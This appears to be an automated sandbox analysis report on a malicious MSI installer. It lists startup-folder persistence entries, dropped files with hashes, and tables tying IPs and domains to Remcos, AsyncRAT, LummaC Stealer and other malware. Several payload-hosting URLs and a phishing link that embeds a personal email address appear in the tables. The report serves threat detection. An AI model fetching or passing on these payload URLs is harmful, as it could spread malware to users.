• Excluded IPs from analysis (whitelisted): 20.198.119.143, 20.109.210.53, 13.85.23.206, 2.16.158.187, 2.16.158.179, 2.16.158.81, 2.16.158.90, 2.16.158.91, 2.16.158.83, 2.16.158.185, 2.16.158.82, 2.16.158.169
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:25:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RaftelibeGasrss.lnk
01:25:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkdaemon_test.lnk
19:25:10 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
19:25:59 | API Interceptor | 2x Sleep call for process: cmd.exe modified
19:25:59 | API Interceptor | 2x Sleep call for process: EHttpSrv.exe modified
19:26:07 | API Interceptor | 135938x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.108.133 | cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.157.162.126 | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos |
185.157.162.126 | LauncherPred8.3.37Stablesetup.msi | malicious | Remcos |
185.157.162.126 | Slf.msi | malicious | Remcos |
20.233.83.145 | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos |
20.233.83.145 | file.exe | malicious | Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc |
20.233.83.145 | file.exe | malicious | AsyncRAT, DcRat, Stealerium |
20.233.83.145 | stub.exe | malicious | AsyncRAT, DcRat, Stealerium |
20.233.83.145 | ww7Oxm9pwx.exe | malicious | Unknown |
20.233.83.145 | qbVjvy9gv2.exe | malicious | AsyncRAT, DcRat, Stealerium |
20.233.83.145 | TXj1ICMUqd.exe | malicious | AsyncRAT, DcRat, Stealerium |
20.233.83.145 | cY6HT7CeBF.exe | malicious | AsyncRAT, DcRat, Stealerium |
20.233.83.145 | ww7Oxm9pwx.exe | malicious | Unknown |
20.233.83.145 | lka01EskGw.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
github.com | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 20.233.83.145
github.com | file.exe | malicious | Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc | 20.233.83.145
github.com | file.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
github.com | stub.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
github.com | ww7Oxm9pwx.exe | malicious | Unknown | 20.233.83.145
github.com | qbVjvy9gv2.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
github.com | 9arEd0o4IZ.exe | malicious | Unknown | 20.233.83.146
github.com | IwSa5fjMWm.exe | malicious | Unknown | 20.233.83.146
github.com | 051qAVqlq9.exe | malicious | Unknown | 20.233.83.146
github.com | TXj1ICMUqd.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
bg.microsoft.map.fastly.net | phish_alert_iocp_v1.4.48 (80).eml | malicious | InvoiceScam | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim | 199.232.214.172
bg.microsoft.map.fastly.net | https://e.letscompress.online/update.txt | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Enquiry.js | malicious | AgentTesla | 199.232.210.172
bg.microsoft.map.fastly.net | stub.exe | malicious | AsyncRAT, DcRat, Stealerium | 199.232.210.172
bg.microsoft.map.fastly.net | 051qAVqlq9.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | zBsyPM1YmX.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | SwiftCopy.xla.xlsx | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs | malicious | Remcos, GuLoader | 199.232.214.172
bg.microsoft.map.fastly.net | INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbs | malicious | Remcos, GuLoader | 199.232.214.172
raw.githubusercontent.com | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.199.108.133
raw.githubusercontent.com | weWHT1b7JO.dll | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | file.exe | malicious | Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc | 185.199.111.133
raw.githubusercontent.com | file.exe | malicious | Stealerium | 185.199.110.133
raw.githubusercontent.com | file.exe | malicious | AsyncRAT, DcRat, Stealerium | 185.199.109.133
raw.githubusercontent.com | file.exe | malicious | Clipboard Hijacker | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | Clipboard Hijacker | 185.199.110.133
raw.githubusercontent.com | stub.exe | malicious | Stealerium | 185.199.108.133
raw.githubusercontent.com | pPLD6OSn7O.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | stub.exe | malicious | AsyncRAT, DcRat, Stealerium | 185.199.110.133
s-part-0035.t-0009.t-msedge.net | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | RezQY7jWu8.exe | malicious | XRed | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | siveria.exe | malicious | CredGrabber, Meduza Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OBE-EUROPEObenetworkEuropeSE | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
OBE-EUROPEObenetworkEuropeSE | la.bot.arm6.elf | malicious | Unknown | 193.183.116.8
OBE-EUROPEObenetworkEuropeSE | LauncherPred8.3.37Stablesetup.msi | malicious | Remcos | 185.157.162.126
OBE-EUROPEObenetworkEuropeSE | Slf.msi | malicious | Remcos | 185.157.162.126
OBE-EUROPEObenetworkEuropeSE | HSG-IVN-2093456FIN.exe | malicious | Remcos | 185.157.163.135
OBE-EUROPEObenetworkEuropeSE | Payload 94.75.225.exe | malicious | Unknown | 45.148.17.56
OBE-EUROPEObenetworkEuropeSE | nabarm5.elf | malicious | Unknown | 185.242.230.228
OBE-EUROPEObenetworkEuropeSE | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 193.187.91.212
OBE-EUROPEObenetworkEuropeSE | Order_MG2027176.vbs | malicious | Remcos, GuLoader | 185.157.163.135
OBE-EUROPEObenetworkEuropeSE | Scanned_22C-6e24090516030.pdf.vbs | malicious | Remcos, GuLoader | 193.187.91.214
MICROSOFT-CORP-MSN-AS-BLOCKUS | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 20.233.83.145
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | RezQY7jWu8.exe | malicious | XRed | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 52.168.117.173
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3d | malicious | HTMLPhisher | 104.47.75.220
FASTLYUS | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.199.108.133
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91
FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.129.91
Match | Associated Sample Name / URL | Detection | Threat Name | Context
28a2c9bd18a11de089ef85a160da29e4 | LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | LummaC Stealer | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | RezQY7jWu8.exe | malicious | XRed | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | https://noisefreqs.com/Ray-verify.html | malicious | Unknown | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/ | malicious | Unknown | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | http://trk.allsportspass.club | malicious | Unknown | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | LummaC Stealer | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | LummaC Stealer | 185.199.108.133, 20.233.83.145
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | LummaC Stealer | 185.199.108.133, 20.233.83.145
                                                                                                Match / Associated Sample Name / Detection / Threat Name:
                                                                                                Match: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious, Threat Name: Clipboard Hijacker, MicroClip, Remcos
                                                                                                • Filename: LauncherPred8.3.37Stablesetup.msi, Detection: malicious, Threat Name: Remcos
                                                                                                • Filename: Slf.msi, Detection: malicious, Threat Name: Remcos
                                                                                                • Filename: ystCwvqbxR.exe, Detection: malicious, Threat Name: LummaC Stealer, RedLine, SectopRAT
                                                                                                • Filename: D3VUOgNs63.exe, Detection: malicious, Threat Name: LummaC Stealer
                                                                                                Match: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll
                                                                                                • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious, Threat Name: Clipboard Hijacker, MicroClip, Remcos
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2706
                                                                                                            Entropy (8bit):5.45485237389586
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:7TYTQ9hsp4lZ/Q7tOLPtmdZhLdZjdZZKl33bwHeKq3vcRgu:7TYT2hQ4lZ/omOhzbZsRJcKu
                                                                                                            MD5:4ACB760D87248C7FC602D3CE1776C449
                                                                                                            SHA1:12C002310974CD191EC48D08653BDF02B4E1678C
                                                                                                            SHA-256:55E30AA80544F0D1688C8D68EBF3B7FBE0ECC7F0E933DA21BE37A97FB5450611
                                                                                                            SHA-512:DB1DEA49BF9584A9360E140453E30042234206C97877A6661C5CABE3F4D41EB91EAA952F76DB077B5C0881100B3EF87B2524A3A40604AD341016B3C2FF414C13
                                                                                                            Malicious:false
                                                                                                            Preview:...@IXOS.@.....@5.}Y.@.....@.....@.....@.....@.....@......&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}..dermys..Slf.msi.@.....@.....@.....@........&.{02DCC2F2-67E6-46B0-92E0-2CB394AB055F}.....@.....@.....@.....@.......@.....@.....@.......@......dermys......Rollback..Annulation de l'action: ....RollbackCleanup%.Effacement des fichiers de sauvegarde..Fichier: [1]....ProcessComponents9.M.i.s.e. ... .j.o.u.r. .d.e.s. .i.n.f.o.r.m.a.t.i.o.n. .d.'.e.n.r.e.g.i.s.t.r.e.m.e.n.t. .d.u. .c.o.m.p.o.s.a.n.t...&.{0E0C50F8-B210-4B4D-91B3-D1FB7FE78CFA}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{BA5264B4-F3AE-4F52-99B5-3968C5A81E6A}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{6B83B1C9-08BB-4AEA-A6A8-8797A2558FDB}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{F74533CE-84F1-400D-ABB3-76E2590644A5}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{80922E60-CA5C-47B6-8B4C-D47FFA72F238}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{6D606797-1F46-48D5-926D-D91FB8EFECB0}&.{BB2F3E18-3F04-450F-
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20680
                                                                                                            Entropy (8bit):6.088615575328619
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:Damtvzlx5v02RIDauMTnxOn6sGCYJLW7wycJbi6jc:D7Jv0qpukxO6s6Lhbimc
                                                                                                            MD5:9329BA45C8B97485926A171E34C2ABB8
                                                                                                            SHA1:20118BC0432B4E8B3660A4B038B20CA28F721E5C
                                                                                                            SHA-256:EFFA6FCB8759375B4089CCF61202A5C63243F4102872E64E3EB0A1BDC2727659
                                                                                                            SHA-512:0AF06B5495142BA0632A46BE0778A7BD3D507E9848B3159436AA504536919ABBCACD8B740EF4B591296E86604B49E0642FEE2C273A45E44B41A80F91A1D52ACC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious
                                                                                                            • Filename: LauncherPred8.3.37Stablesetup.msi, Detection: malicious
                                                                                                            • Filename: Slf.msi, Detection: malicious
                                                                                                            • Filename: ystCwvqbxR.exe, Detection: malicious
                                                                                                            • Filename: D3VUOgNs63.exe, Detection: malicious
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3.u....3......3......3......3......3..3.3......3......3......3.Rich.3.................PE..L......K.....................................0....@..........................`......_A.......................................6..d....P...............6..............P1...............................4..@............0..(............................text............................... ..`.rdata..6....0......................@..@.data........@.......(..............@....rsrc........P.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (504), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1870
                                                                                                            Entropy (8bit):5.392327712070946
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:3SlK+hig4FB09kkK0hpzWU09kkKqYhzVC09kkK0FFzY:ClthaTXkHnCUXk8hgXkFj8
                                                                                                            MD5:D34B3DA03C59F38A510EAA8CCC151EC7
                                                                                                            SHA1:41B978588A9902F5E14B2B693973CB210ED900B2
                                                                                                            SHA-256:A50941352CB9D8F7BA6FBF7DB5C8AF95FB5AB76FC5D60CFD0984E558678908CC
                                                                                                            SHA-512:231A97761D652A0FC133B930ABBA07D456BA6CD70703A632FD7292F6EE00E50EF28562159E54ACC3FC6CC118F766EA3F2F8392579AE31CC9C0C1C0DD761D36F7
                                                                                                            Malicious:false
                                                                                                            Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable></noInheritable>.. <assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>.. <file name="msvcr80.dll" hash="0a38b652c9d03caab803c6b2505fa301e345bab2" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#"><dsig:Transforms><dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity"></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></dsig:DigestMethod><dsig:DigestValue>TM0VvywbHVQayIOw9CSX6M7WpaM=</dsig:DigestValue></asmv2:hash></file>.. <file name="msvcp80.dll" hash="678bf3da5d1987bb88fd47c4801ecb41f51366ef" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xm
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (504), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2372
                                                                                                            Entropy (8bit):5.379862999788816
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:3SlK+5g4DJO09kkKBhZzY09kkKeIzl09kkKzzP09kkKXzY:CltFUXkcLEXkhIRXkm7Xk+8
                                                                                                            MD5:F1BB778577CFB1E45ADFBB2EAAAD7F58
                                                                                                            SHA1:171B0121B165B701482F96B02E7ADFFD6C799FCE
                                                                                                            SHA-256:53B6CDAB4A829674082048606A65111A2D6AC3A1B2BCFB8BE34D8296590D42DE
                                                                                                            SHA-512:4D125D773A3DD6A0CB755B69053F7D305DE03C3FA9854A87A9ECF504C23C8C37BA3FE533B0CD45762B340E6B8065D33BF7280A76376077FB734EAE52F950249D
                                                                                                            Malicious:false
                                                                                                            Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable></noInheritable>.. <assemblyIdentity type="win32" name="Microsoft.VC80.MFC" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>.. <file name="mfc80.dll" hash="46fc9af0bb795fec574d619bfd84f019f56debb4" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#"><dsig:Transforms><dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity"></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></dsig:DigestMethod><dsig:DigestValue>JMgFAKGMt+YOD/s362I/Ku+VEqs=</dsig:DigestValue></asmv2:hash></file>.. <file name="mfc80u.dll" hash="1d3d4e3c0689295a042c2834f2336a76ebaa9e4f" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1237
                                                                                                            Entropy (8bit):5.33286502858899
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dtMEDJ/eiNK+EItg4NnZsstwsED4lla117+7W28mcP:ciEDJdK+/g4BgCCw76l
                                                                                                            MD5:526C8811D11C65F7EBCA8D5F38421188
                                                                                                            SHA1:F964CC250E326101F636A6293ECC710761EF7CCF
                                                                                                            SHA-256:571AF1EA18CA3F68C321975E7B1A1146B00DFA9349D5711A30C7CF89045A6A1A
                                                                                                            SHA-512:42E328781BFFF24112D6D9C2A84CF2DE95DC9767B8B4DD8B6DE099722C236350401E483C2710196DD7092C5B9A03F65A6938DD680E5A2CBBC288A6344F950929
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.. Copyright . 1981-2001 Microsoft Corporation -->..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable/>.. <assemblyIdentity type="win32" name="Microsoft.VC80.MFCLOC" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"/>.. <file name="mfc80CHS.dll" hash="754165cac2d8fce9978dafeb313cea44852c9bf4" hashalg="SHA1"/>.. <file name="mfc80CHT.dll" hash="9167a79af2333f96551b12db36100f24801c4e98" hashalg="SHA1"/>.. <file name="mfc80DEU.dll" hash="72017b690322656f574718d51bc926ace81808f2" hashalg="SHA1"/>.. <file name="mfc80ENU.dll" hash="fb919708d073d2fa2174d3a328457c3be36cd4b5" hashalg="SHA1"/>.. <file name="mfc80ESP.dll" hash="b4536e19ba2f27ed4eb4d714a6f4b7fc69b5fb99" hashalg="SHA1"/>.. <file name="mfc80FRA.dll" hash="9157b1ab7a8c2b56f562f962370c75bbe726e8c6" hashalg="SHA1"/>.. <file name="mfc80ITA.dll" hash="5bcbbcf7fcc05361078ae12cc803
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):372224
                                                                                                            Entropy (8bit):7.7008720235421775
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:HmkM9O5geNqoeWzPKclTBjAadj2BnEMbFmWuxTrA3a0UJYLuO5eJzm6LR6KrI3:9M9O5geNMBclTNAad6BnRm95AK1JY6a1
                                                                                                            MD5:3CA940E27E87443F7891D39536650F9B
                                                                                                            SHA1:2603FF220C43F13591A51ABB0CF339AECB758207
                                                                                                            SHA-256:A91F13AECE1EA7EBE326F0E340BDA9D00613D3365CD81B7F138A4C9446FFBD38
                                                                                                            SHA-512:0C0E04CBB8247F6DFE0790D1C3453596E3CB5F5FF0D2C3BC4E01FB38AD8E042322130072263C135C5637A745EF70AC68487BDADE3510990CE8F609CAD46566EE
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 46%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .T...........#.....4..........`........P.....b.........................0............... ......................................0..X.................... ............................... .......................................................text....3.......4..................`.P`.data...\....P.......8..............@.0..rdata..@J...`...L...:..............@.`@.eh_fram *.......,..................@.0@.bss....0.............................`..edata..............................@.0@.idata..............................@.0..CRT................................@.0..tls.... .... ......................@.0..rsrc...X....0......................@.0..reloc....... ......................@.0B........................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Category:dropped
                                                                                                            Size (bytes):506816
                                                                                                            Entropy (8bit):7.443415941343508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:n7eZ+haXoavdfm10f4MS1djcX6Sc+B/b+XdNUaMkfxnMfJYLuO1CJzy6LR6KrI1O:78+haL5miiB8c+BEUaMuGJY64wzRprB
                                                                                                            MD5:253C52411B256E4AF301CBA58DCB6CEF
                                                                                                            SHA1:F21252C959B9EB47CD210F41B997CF598612D7C9
                                                                                                            SHA-256:7D57B704DD881413E7EE2EFFB3D85BDFFF1E208B0F3F745419E640930D9D339D
                                                                                                            SHA-512:40DE728EDAE55F97AC9459CF78BBC31B38E8B59BDB7A74FBD9E09D7EFD2A81B1DC5FD8011007C66EFB58E850F1C57D099EC340AECD62911D6AEBF2E70D1275D0
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.......2............@..........................0............@.................................<........... ............................................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........|..............@....ndata...................................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PNG image data, 535 x 323, 8-bit/color RGBA, non-interlaced
                                                                                                            Category:dropped
                                                                                                            Size (bytes):898642
                                                                                                            Entropy (8bit):7.939726917918056
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:huxSUG0FCq7vlCaw416/GCvEowni/F9jXR54:MRJFCq7vl6zdj2
                                                                                                            MD5:5124236FD955464317FBB1F344A1D2F2
                                                                                                            SHA1:FE3A91E252F1DC3C3B4980ADE7157369EA6F5097
                                                                                                            SHA-256:ED1389002CDF96C9B54DE35B6E972166EE3296D628943FD594A383E674C5CBA6
                                                                                                            SHA-512:2B2AC23244B16F936EF9A4049586F58C809FCC4391A56390CC5DB2E8D96140001E0B977680ED1D8B0AB9C410E865A880209E22ADD8D42E563DC40BC91236B252
                                                                                                            Malicious:false
